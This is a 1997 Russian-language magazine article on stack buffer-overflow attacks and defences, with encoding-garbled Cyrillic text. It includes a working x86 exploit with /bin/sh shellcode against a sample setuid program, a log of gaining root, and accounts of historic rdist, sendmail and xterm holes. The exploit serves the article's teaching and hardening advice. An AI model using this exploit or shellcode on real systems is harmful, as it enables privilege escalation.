‚адим Љолонцов. WDL magazine. "Buffer overflows"

‚адим Љолонцов. WDL magazine. "Buffer overflows"

Ћригинал этого документа расположен на
http://www.tversu.ac.ru/wdl/articles/overflows.html

ЌЂ‰’€, ЏђЋ‚…ђ€’њ € ЋЃ…‡‚ђ…„€’њ

‚адим Љолонцов

‚ступление

Џредотвращение различного рода атак, которым подвергаютсЯ современные компьютерные системы - настолько объемнаЯ тема, что часто, стремЯсь охватить ее полностью, многие публикации получаютсЯ излишне обобщенными, без конкретных рекомендаций по выЯвлению, проверке и обезвреживанию хакерских атак. ЏредлагаемаЯ статьЯ имеет целью заполнить этот пробел и посвЯщена детальному обсуждению часто очень малопонЯтных атак из класса "buffer-overflow" и методам защиты от них. ђечь пойдет об одной из технологий, котораЯ сегоднЯ используетсЯ все чаще и требует длЯ борьбы с ней пониманиЯ работы системы и навыков программированиЯ, лишний раз показываЯ, что культура программированиЯ - вопрос не только стилЯ, но и безопасности. ‘татьЯ ориентирована на администраторов и программистов, предпочитающих не только знать ответ на вопрос "как?", но и на вопрос "почему?".

€так...

…сли вы когда-нибудь программировали на Cи или Џаскале, то сталкивалась с ошибками типа "Memory fault - core dumped" или "General Protection Fault". Љак правило, эти происходит, если программа попыталась получить доступ к не принадлежащей ей области памЯти. ќто довольно часто случаетсЯ, если программист забыл, например, проверить размеры строки, заносимой в буфер, и остаток строки "въехал" в какие-то другие данные или даже в код. ‚ защищенном режиме программа-монитор или Ядро операционной системы может контролировать попытки доступа к "чужой памЯти" и завершать нарушившую правила программу. Ћдни операционные системы делают эту лучше - UNIX, другие оболочки - хуже (Windows), а такие, как MS DOS, вообще не умеют ничего подобного и лишь банально зависают.

—асто такие ошибки проЯвлЯютсЯ не сразу. Џредположим, программист считает, что 1024 байта, которые он выделил под временный буфер будет вполне достаточно во всех случаев. •орошо, если это так. Ќо, как показывает опыт, это допущение представлЯет собой потенциально слабое место в программе, которое обЯзательно даст о себе знать. •орошо, если программа работает в однопользовательской Ћ‘ - как максимум, сбой приведет к зависанию компьютера; но в многопользовательской, и, тем более, сетевой Ћ‘, последствиЯ могут быть более серьезными - маленькое "допущение" способно разрушить всю систему безопасности сети, которую администратор так старательно возводил.

‘амое плохое, что эти "допущениЯ" молчат о себе достаточно долгое времЯ, никак не проЯвлЯЯсь, а часто обнаруживают себЯ, лишь попавшись на глаза хакеру. Џреувеличение? Ќет. €звестный вирус Њорриса, поразивший в свое времЯ тысЯчи компьютеров, использовал, в частности, этот алгоритм длЯ проникновениЯ в защищенные системы. Ђ простое наблюдение за событиЯми, происходЯщими сегоднЯ в области безопасности дает все основаниЯ считать, что идет целаЯ волна "buffer-overflow exploits" - общее название длЯ программ, которые длЯ прорыва в систему и/или длЯ получениЯ привилегий суперпользователЯ используют неточности в контроле размеров строк и буферов.

1. ‘уть проблемы

„лЯ того, чтобы понЯть механизм работы, мы будем использовать простую программу под названием "rabbit.c":

#include 
#include 

void process(char *str)
{
  char buffer[256];

  strcpy(buffer, str);
  printf("„лина строки = %d\n", strlen(buffer));
  return;
}

void main(int argc, char *argv[])
{
  if (argc == 2)
    process(argv[1]);
  else
    printf("Usage: %s some_string\n", argv[0]);
}

Џодобные фрагменты программ, в которых функциЯ принимает строку как один из нескольких аргументов, имеет локальный буфер ограниченного размера, использует вызовы типа strcpy() или sprintf(), можно встретить в большом количестве программ.

ђазберемсЯ в деталЯх, как в большинстве случаев происходит вызов функции process(). €так, стек (будем считать, что он растет вверх) перед вызовом функции выглЯдит следующим образом:

|. . . |  (область младших адресов)
|      |
|------|  <== “казатель верхушки стека
|XXXXXX|
|XXXXXX|  €спользованнаЯ часть стека
|XXXXXX|
|. . . |  (область старших адресов)

Џараметры функции передаютсЯ через стек - туда заносЯтсЯ указатели на параметры или сами параметры (в нашем случае это один указатель на строку), а вызваннаЯ функциЯ извлекает их оттуда. …стественно, всем этим занимаетсЯ код, сгенерированный компилЯтором - программист не принимает участиЯ в этом процессе. Џосле того, как параметры занесены в стек, а процессор встречает инструкцию вызова функции он заносит в стек некоторую информацию о текущем состоЯнии - как правило, это смещение следующей после команды вызова. ’аким образом, функциЯ, завершив свою работу, будет знать адрес возврата управлениЯ. ‚ результате, во времЯ выполнениЯ первой строки функции стек имеет следующий вид:

|. . . |  (область младших адресов)
|      |
|------|  <== “казатель на верхушку стека
|RETADR|  <== Ђдрес возврата
|PARAMS|  <== Џараметры функции
|XXXXXX|
|XXXXXX|  €спользованнаЯ часть стека
|XXXXXX|
|. . . |  (область старших адресов)

—то происходит дальше? ”ункции надо запомнить указатель на текущую верхушку стека (BP), который будет использоватьсЯ в ссылке на параметры. Џоэтому выполнЯютсЯ следующие две инструкции (в качестве примера рассмотрим семейство x86):

    push bp
    mov  bp,sp

’еперь в верхушке стека лежит предыдущее значение регистра BP, а сам он указывает на верхушку стека и может быть использован в качестве базового регистра при ссылке на параметры.

‚ программе был объЯвлен размер буфера в 256 байт. Џоскольку не использовались функции malloc() или new длЯ выделениЯ требуемого объема памЯти, и не указывалсЯ модификатор "static", этот буфер будет зарезервирован в стеке. Џосле всех этих операций стек имеет следующий вид:

|. . . |  (область младших адресов)
|      |
|------|  <== ‚ерхушка стека
|??????|  <== Ќачало зарезервированного буфера
|??????|   . . .
|??????|  <== Љонец буфера
|OLD BP|  <== ‘тарое значение регистра BP
|RETADR|  <== Ђдрес возврата
|PARAMS|  <== Џараметры
|XXXXXX|
|XXXXXX|  ЌекаЯ уже занЯтаЯ часть стека
|XXXXXX|
|. . . |  (область старших адресов)

Џосле всего этого программа работает прекрасно, пока дело не доходит до вызова функции "strcpy()". …сли длина строки меньше или равна длине буфера, то все пройдет хорошо, функциЯ отработает, освободит зарезервированное пространство, восстановит регистр BP, и, наконец, вернет управление программе, котораЯ очистит стек от переданных параметров.

—то же произойдет, если длина строки будет больше размера буфера? Џоскольку strcpy() копирует все символы, пока не встретит код конца строки - "0", часть строки затрет верхнюю часть стека и, естественно, может испортить поле RETADR. ‚прочем, это станет заметно не сразу - все будет работать великолепно, пока дело не дойдет до вызова return(). “правление будет передано по адресу, который хранитсЯ в поле RETADR, но поскольку адрес испорчен, выполнение программы продолжитсЯ в некой точке адресного пространства, отличающейсЯ от точки вызова. ‚от в этом-то месте и произойдет исключительнаЯ ситуациЯ и программа будет аварийно прервана, поскольку маловероЯтно, чтобы адрес возврата указывал на какой-то осмысленной код, причем находЯщийсЯ в области памЯти данной программы.

2. ЊаловероЯтно, но возможно

Ћднако, это оказываетсЯ возможным, если кто-то специально хотел вызвать подобную ситуацию. ‚едь что мешает в качестве аргумента функции передать строку специально подобранной длины, так, что бы она содержала некоторый машинный код, причем при затирании верхушки стека в поле REDADR попадал адрес именно этого кода? Џосле отработки функции return() управление получит новый фрагмент, что совсем не предусматривалось автором программы. Ќу а этот фрагмент уже сможет выполнить произвольную операцию, обращаЯсь к сервису операционной системы.

Љак же будет выглЯдеть стек после вызова strcpy()?

   |. . . |  (область младших адресов)
   |      |
   |------|  <== ‚ерхушка стека
+->|!!!!!!|
|  |!!!!!!|  <== Њашинный код хакера
|  |!!!!!!|
|  |OLD BP| <== ‘тарое значение регистра BP (испорченное, но это уже неважно)
+--|RETADR|  <== Ђдрес возврата (исправленный)
   |PARAMS|  <== Џараметры
   |XXXXXX|
   |XXXXXX|  ЌекаЯ уже занЯтаЯ часть стека
   |XXXXXX|
   |. . . |  (область старших адресов)

Љак создаетсЯ такой машинный код? ‚о-первых, стоит выЯснить примерный адрес верхушки стека на данной машине при вызове функций, чтобы корректно сформировать адрес возврата, который попадет в поле RETADR. Љак правило это делаетсЯ программой exploit с помощью вызова пустой функции, возвращающей в качестве параметра значение верхушки стека. ‚о-вторых, фрагмент должен быть написан таким образом, чтобы не содержать символа 0, который будет расценен, как конец строки - этим символом код будет заканчиватьсЯ. Љонечно, он попадет при копировании в область параметров, но хакера это, как и испорченный регистр BP, не волнует - главное, управление будет передано на чужеродный фрагмент. ‚-третьих, точно должны быть рассчитаны размеры буфера, чтобы все попало в нужные места и не вызвало обычного core dump, должны быть учитаны размеры других переменных, стоЯщих между буфером и RETADR. €, наконец, в-четвертых - хакер должен уметь вызывать функции операционной системы.

•отЯ задача кажетсЯ довольно нетривиальной, в ней нет ничего сложного длЯ программиста, знающего систему. Ќапример, подобный код длЯ Linux, BSD-family, а также Ћ‘ Solaris, вызывающий /bin/sh и легко подстраиваемый под конкретные размеры буфера, довольно широко гулЯет по Internet и может быть использован длЯ обнаружениЯ хакером новой дырки в программах. Ђ это обнаружение требует лишь терпениЯ, ибо в Internet доступны исходные тексты огромного количества программ и утилит - даже коммерческого Solaris.

3. Џример программы-exploit'а

Џрограмма exploit.c (х86), демонстрирующаЯ, как можно воспользоватьсЯ неточностью, допущенной в тестовом примере rabbit.c.


#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             256
#define SKIP_VARS               4

/* Џолучить указатель на стек */
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   char *ptr = NULL;
   int i;

   /* „анный фрагмент выполнЯет вызов /bin/sh */
   char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
                      "\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
                      "\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
                      "\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
                      "\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";


   /* ‚ыделЯем памЯть */
   buff = malloc(BUFFER_SIZE+16);
   if(!buff)
   {
      perror("Can't allocate memory");
      exit(0);
   }
   ptr = buff;

   /* ‡аполнЯем начало строки кодами команды NOP ("нет операции") */
   for (i=0; i < BUFFER_SIZE-strlen(execshell); i++)
     *(ptr++) = 0x90;

   /* ’еперь копируем в строку машинный код */
   for (i=0; i < strlen(execshell); i++)
      *(ptr++) = execshell[i];

   /* Џропускаем все, что лежит между буфером и адресом возврата */
   for (i=0; i < SKIP_VARS; i++)
     *(ptr++) = 0x90;

   /* ‡аписываем адрес возврата */
   *(long *)ptr = get_esp() + DEFAULT_OFFSET;
   ptr += 4;

   /* ‡авершающий 0 */
   *ptr = 0;

   /* ‚ызов программы с сформированной строкой в качестве аргумента */
   printf("%s\n", buff);
   execl("./rabbit", "rabbit", buff, NULL);
}

Џример компилЯции и выполнениЯ:

# id
uid=0(root) gid=0(wheel)
# gcc -o rabbit rabbit.c
# chmod u+s rabbit
# ls -l rabbit                          -- €так, rabbit - root-setuid
-rwsr-xr-x  1 root  wheel  12288 Jan  1 00:01 rabbit
# su user
$ id
uid=200 (user), group = 200 (users)     -- џ - обычный пользователь
$ ./rabbit test                         -- Џрограмма работает нормально...
„лина строки = 4
$ gcc -o exploit exploit.c              -- ЏодготавливаемсЯ...
$ ./exploit                             -- ‡апускаем exploit, а тот
„лина строки = 264                      -- запускает rabbit
# id
uid=200(root) gid=200(users) euid=0(root) -- Ћп-лЯ, Я суперпользователь!

4. Ќасколько реальна опасность?

Њожно возразить, что существуют гораздо более простые способы проникновениЯ в систему, чем упомЯнутый. Ќе совсем так. Ѓолее простые способы часто не работают, поскольку широко известны; в данном же случае имеет место гораздо более малоизвестнаЯ ситуациЯ. Љроме этого, существует слишком большое количество программ с описанными ошибками, которые мгновенно превращаютсЯ в лазейки длЯ хакера. ‚едь даннаЯ проблема не относитсЯ к типу "дырок" в sendmail, которые закрываютсЯ раз и навсегда, а представлЯет собой уже некую технологию, котораЯ может использоватьсЯ достаточно часто.

ѓлавнаЯ же проблема заключаетсЯ в глобальности - ведь программа не обращаетсЯ к системным ресурсам. Љ стеку обращаетсЯ программа пользователЯ, причем не к системному стеку, а к своему, что вполне естественно. Љроме того, нужно еще поискать Ћ‘, котораЯ проверЯет, затирает ли записываемаЯ в стек строка его верхушку. ќто дело либо программиста и/или компилЯтора. Ќа уровне Ћ‘ это невозможно детектировать, так как нарушениЯ защиты не происходит - программа не выходит за пределы стека или сегмента.

’аким образом, метод работает везде, где

есть стек
имеетсЯ возможность вызвать систему через некий system call
адрес возврата из процедуры кладетсЯ в стек
локальные переменные размещаютсЯ в стеке
возможно выполнение кода, находЯщегосЯ в стеке
существуют программы, выполнЯемые в режиме суперпользователЯ, доступные обычному пользователю и/или демоны, содержащие ошибки.

Љак известно, этим требованиЯм удовлетворЯют практически все операционные системы - именно поэтому проблема ЯвлЯетсЯ столь глобальной.

5. …ще примеры

‚ программе rdist из BSD в одном из вызовов отсутствовала проверка на размер параметра, передаваемой из командной строки. ‘уществует программа, котораЯ формирует требуемый код и вызывает /usr/bin/rdist, передаваЯ код в качестве параметра. Џоскольку rdist выполнЯетсЯ с привилегиЯми суперпользователЯ (setuid bit), переданный код также выполнЯлсЯ с привилегиЯми root и в распорЯжении хакера оказывалсЯ shell с правами root.

‚ одной из версий POP-сервера проверка длины строки присутствовала, но не была до конца корректной - не отлавливалось переполнение при вызове sprintf(). —то это означает? Ѓыла написана программа, котораЯ соединЯлась с 110-м портом (pop3-сервис) и передавала ему сформированный код, после чего pop-сервер сообщал о неверной команде sprintf() и "вываливалсЯ" в shell после return(), причем с правами суперпользователЯ root. Џричем в данном случае хакеру даже не требовалось иметь свой раздел на машине, чтобы прорватьсЯ на нее, да еще и с правами root.

Џресловутый вирус Њорриса использовал аналогичную неточность в широко распространенной программе finger, и доказал свою работоспособность, разойдЯсь за несколько часов на огромное количество компьютеров в научных и военных сетЯх ‘Ђ.

Џрограммы, написанные под X-Window, как правило, передают параметр "-display " на обработку X-библиотеке. Џлохо, что в XFree86 размеры displayname не проверЯютсЯ, и уже доступен код длЯ получениЯ root-привилегий через /usr/X11R6/bin/xterm. Ќо еще хуже, что код Xlib используетсЯ практически во всех X-программах.

‘овсем недавно в списке рассылки freebsd-security была опубликована информациЯ о ошибке - отсутствие проверки размера буфера - в подсистеме печати, ЯвлЯющейсЯ фактическим стандартом и использующейсЯ во всех семействах BSD, SunOS, а также входЯщей в состав остальных операционных систем (длЯ совместимости). Ѓезусловно, рано или поздно эта ошибка будет исправлена, но сколько проблем могут возникнуть до этого момента?

Ћчень жаль, что в последнее времЯ примеры exploit-кода стали широко доступны, и часто человеку (далеко не системному программисту), заметившему неточность в программе, достаточно подкорректировать лишь несколько переменных (типа BUFFER_SIZE, SKIP_VARS) длЯ получениЯ работающей программы-бандита.

6. Љак обнаружить слабые места и закрыть их?

Џолитика администратора по безопасности может кратко охарактеризоватьсЯ всего двумЯ лозунгами: "предотвращай" и "оперативно реагируй".

ЌесмотрЯ на то, что сегоднЯ существует большое количество клонов UNIX, рекомендации выглЯдЯт примерно одинаково длЯ всех платформ, поскольку принципы используютсЯ одни и те же. Ќекоторые различиЯ состоЯт в том, что семейство x86 изучено хакерами гораздо лучше, чем, например, Sparc или MIPS, а наличием доступных исходных текстов могут похвастатьсЯ далеко не все операционные системы. Ћтсутствие текстов затруднЯет как взлом системы, так и исправление ошибок и изучение ее работы - как всегда, любой факт в жизни программиста и администратора ЯвлЯетсЯ палкой о двух концах.

6.1 Џредотвращай

Џрежде всего, подразумеваетсЯ, что уже выполнены все исправлениЯ в системе, информациЯ о которых может быть получена у поставщика Ћ‘. Ћднако пока успокаиватьсЯ рано - порой производители Ћ‘ сами не очень оперативно реагируют на обнаружение ошибок в их продуктах. Џоэтому можно предложить еще несколько вариантов защиты от ошибок класса buffer-overflow exploits.

‚ариант первый - если доступны исходные тексты и много свободного времени: в программах, выполнЯющихсЯ с привилегиЯми суперпользователЯ (root setuid-программы; программы, вызывающиесЯ из inetd и т.д.) надо отыскать все вызовы функций strcpy, gets, sprintf а, возможно, других функций работы со строками, и проверить, не используютсЯ ли при этом локальные буферы фиксированной длины. Њожно еще поискать константы типа BUFSIZ, PATH_MAX и др. Џроанализировав текст, можно выполнить следующие действиЯ:

добавить проверки на длину строки
заменить strcpy, gets, sprintf etc на их аналоги длЯ фиксированной длины - strncpy, snprintf, fgets
вместо фиксированных буферов использовать динамическое выделение памЯти.

‚ качестве примера ошибочной программы можно привести rdist из BSD:

struct namelist * lookup(name, action, value)
        char *name;
        int action;
        struct namelist *value;
{
        register unsigned n;
        register char *cp;
        register struct syment *s;
        char buf[256];

        .  .  .
                        if (action != INSERT || s->s_type != CONST) {
        /* !!! */                  (void)sprintf(buf, "%s redefined", name);
                                yyerror(buf);

Џроблема в том, что в buf фактически заноситсЯ аргумент из командной строки, длина которого не проверЯетсЯ. „лЯ того, чтобы избавитьсЯ от дырки, достаточно после строки, помеченной знаком "!!!", добавить следующий небольшой фрагмент (вместо простой диагностики может оказатьсЯ полезно добавить запись в файл отчета информации о происшедшем с указанием имени пользователЯ, вызвавшего rdist):

        if (action != INSERT || s->s_type != CONST) {
                if (strlen(name) > 240)
                {
                   printf("The something going on...\n");
                   exit(1);
                }
        (void)sprintf(buf, "%s redefined", name);

‚ариант второй - исходных текстов нет: необходимо написать сценарий, который пытаетсЯ вызвать проверЯемую программу, используЯ различные параметры достаточно большой длины. Ќапример, строка длЯ проверки команды xterm может выглЯдеть как:

  /usr/bin/X11R6/xterm -display `perl '{print "A" x 5000;}'`:0

‚ качестве параметра формируетсЯ строка длиной в 5000 символов (как показывает практика, программисты часто используют константы BUFSIZ, FILENAME_MAX и т.д., определенные в /usr/include, а они, обычно не превышают 2048 байт. €зменЯЯ число в строке и/или анализируЯ исходные тексты, можно уточнить размер буфера в программе.

…сли результатом выполнениЯ этой команды будет одинокаЯ фраза типа: "Memory fault, core dump saved", то это означает, что имеетсЯ достаточно причин, чтобы:

снЯть setuid-бит с программы или запретить ее выполнениЯ всем, кроме суперпользователЯ или ограниченной группы доверенных лиц
найти автора программы
попытатьсЯ самостоЯтельно исправить программу

Ќо не стоит думать, что все так просто. —асто трудно избежать полного анализа текста программы, ведь никто не мешает автору использовать следующую конструкцию:

for (char *temp=buffer;*buffer;buffer++) *temp++=*buffer;

Ђ результат у нее тот же, что и у стандартной функции strcpy(). „а и метод передачи exploit-кода в программу может быть достаточно сложным. Ќапример, длЯ того, что бы воспользоватьсЯ дыркой в sendmail версии ниже чем 8.7.5, код передаетсЯ в GECOS-поле, которое в семействе Ћ‘ BSD пользователь может менЯть с помощью программ chfn, chsh и chpass. “добнаЯ, казалось бы, возможность: смена имени, информации о телефоне/офисе и плюс неточность в sendmail обернулись лазейкой длЯ хакера.

6.2. ђеагируй

Ђдминистратору рекомендуетсЯ подписатьсЯ на такие списки рассылки, посвЯщенные UNIX security, как BUGTRAQ, BoS, WDL; на стандартные уведомлениЯ CERT (Computer Emergency Response Team), из которых можно оперативно узнать о проблеме и закрыть открывшуюсЯ лазейку в системе. Ѓолее подробную информацию о списках рассылки по компьютерной безопасности можно почерпнуть на WDL WWW.

Ќесомненно, длЯ того, чтобы обнаружить атаку, стоит периодически анализировать информацию, которую записывают программы в стандартные файлы отчетов (например /var/log/messages). Љ счастью, имеетсЯ большое количество программ, помогающих администратору следить за его сетью и выполнЯть заданные ежедневные проверки.

Џослесловие

…сли даже вы не работаете в UNIX то не следует успокаиватьсЯ. Ћткуда известно, что прикладнаЯ программа, тот же MS Word, корректно проверЯет все полЯ в DOC-файле и не начнет в один прекрасный момент после загрузки документа форматировать жесткий диск? Љ сожалению, лишь очень тонкаЯ преграда стоит на пути возможного поЯвлениЯ вирусов подобного и заключаетсЯ она малодоступности исходных текстов длЯ продуктов под DOS/WIN, так что хакеру придетсЯ провести бессоные ночи перед отладчиком, разбираЯсь в работе программы.

Љроме этого, любой желающий может убедитьсЯ, что и в NT работает такой метод проникновениЯ в систему, написав простейший пример. Џока на Internet нет программ exploit длЯ NT, однако это дело времени, кроме этого схема системных вызовов в этой Ћ‘ пока еще не устоЯлась и постоЯнно подвергаетсЯ изменению. ’ак что у NT все еще впереди.

‚ыход один - программисты должны сразу создавать надежные программы и отвечать за их работу. € уж как минимум, не использовать буферов и строк фиксированной длины, если нет твердой уверенности в том, что подобные фрагменты будут всегда корректно работать.

‚ качестве последнего совета программистам порекомендую почитать статью "Check list for writing secure Unix code" на уже упоминавшемсЯ WDL WWW


Last-modified: Thu, 03 Jul 1997 07:35:41 GMT
Ћцените этот текст: